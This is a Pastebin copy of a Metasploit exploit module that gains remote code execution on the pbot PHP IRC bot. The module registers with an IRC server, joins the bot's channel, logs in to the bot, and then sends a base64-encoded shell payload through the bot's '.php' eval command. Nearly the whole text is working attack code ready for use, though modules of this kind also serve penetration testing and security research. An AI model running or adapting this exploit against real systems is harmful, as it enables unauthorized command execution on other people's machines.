Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # web site for more information on licensing and terms of use.
- # http://metasploit.com/
- ##
- require 'msf/core'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::Tcp
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'PHP IRC Bot pbot eval() Remote Code Execution',
- 'Description' => %q{
- This module allows remote command execution on the PHP IRC bot pbot by abusing
- the usage of eval() in the implementation of the .php command. In order to work,
- the data to connect to the IRC server and channel where find pbot must be provided.
- The module has been successfully tested on the version of pbot analyzed by Jay
- Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP
- SP3.
- },
- 'Author' =>
- [
- 'evilcry', # pbot analysis'
- 'Jay Turla', # pbot analysis
- '@bwallHatesTwits', # PoC
- 'juan vazquez' # Metasploit module
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'EDB', '20168' ],
- [ 'URL', 'http://offensivecomputing.net/?q=node/1417'],
- [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']
- ],
- 'Platform' => [ 'unix', 'win'],
- 'Arch' => ARCH_CMD,
- 'Payload' =>
- {
- 'Space' => 344, # According to RFC 2812, the max length message is 512, including the cr-lf
- 'BadChars' => '',
- 'DisableNops' => true,
- 'Compat' =>
- {
- 'PayloadType' => 'cmd',
- }
- },
- 'Targets' =>
- [
- [ 'pbot', { } ]
- ],
- 'Privileged' => false,
- 'DisclosureDate' => 'Nov 02 2009',
- 'DefaultTarget' => 0))
- register_options(
- [
- Opt::RPORT(6667),
- OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
- OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
- OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),
- OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])
- ], self.class)
- end
- def check
- connect
- response = register(sock)
- if response =~ /463/ or response =~ /464/
- print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
- return Exploit::CheckCode::Unknown
- end
- response = join(sock)
- if not response =~ /353/ and not response =~ /366/
- print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
- return Exploit::CheckCode::Unknown
- end
- response = pbot_login(sock)
- quit(sock)
- disconnect
- if response =~ /auth/ and response =~ /logged in/
- return Exploit::CheckCode::Vulnerable
- else
- return Exploit::CheckCode::Safe
- end
- end
- def send_msg(sock, data)
- sock.put(data)
- data = ""
- begin
- read_data = sock.get_once(-1, 1)
- while not read_data.nil?
- data << read_data
- read_data = sock.get_once(-1, 1)
- end
- rescue EOFError
- end
- data
- end
- def register(sock)
- msg = ""
- if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
- msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
- end
- if datastore['NICK'].length > 9
- nick = rand_text_alpha(9)
- print_error("The nick is longer than 9 characters, using #{nick}")
- else
- nick = datastore['NICK']
- end
- msg << "NICK #{nick}\r\n"
- msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"
- response = send_msg(sock,msg)
- return response
- end
- def join(sock)
- join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
- response = send_msg(sock, join_msg)
- return response
- end
- def pbot_login(sock)
- login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"
- if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?
- login_msg << " #{datastore['PBOT_PASSWORD']}"
- end
- login_msg << "\r\n"
- response = send_msg(sock, login_msg)
- return response
- end
- def pbot_command(sock)
- encoded = Rex::Text.encode_base64(payload.encoded)
- command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"
- response = send_msg(sock, command_msg)
- return response
- end
- def quit(sock)
- quit_msg = "QUIT :bye bye\r\n"
- sock.put(quit_msg)
- end
- def exploit
- connect
- print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
- response = register(sock)
- if response =~ /463/ or response =~ /464/
- print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
- return
- end
- print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
- response = join(sock)
- if not response =~ /353/ and not response =~ /366/
- print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
- return
- end
- print_status("#{rhost}:#{rport} - Registering with the pbot...")
- response = pbot_login(sock)
- if not response =~ /auth/ or not response =~ /logged in/
- print_error("#{rhost}:#{rport} - Error registering with the pbot")
- return
- end
- print_status("#{rhost}:#{rport} - Exploiting the pbot...")
- pbot_command(sock)
- quit(sock)
- disconnect
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement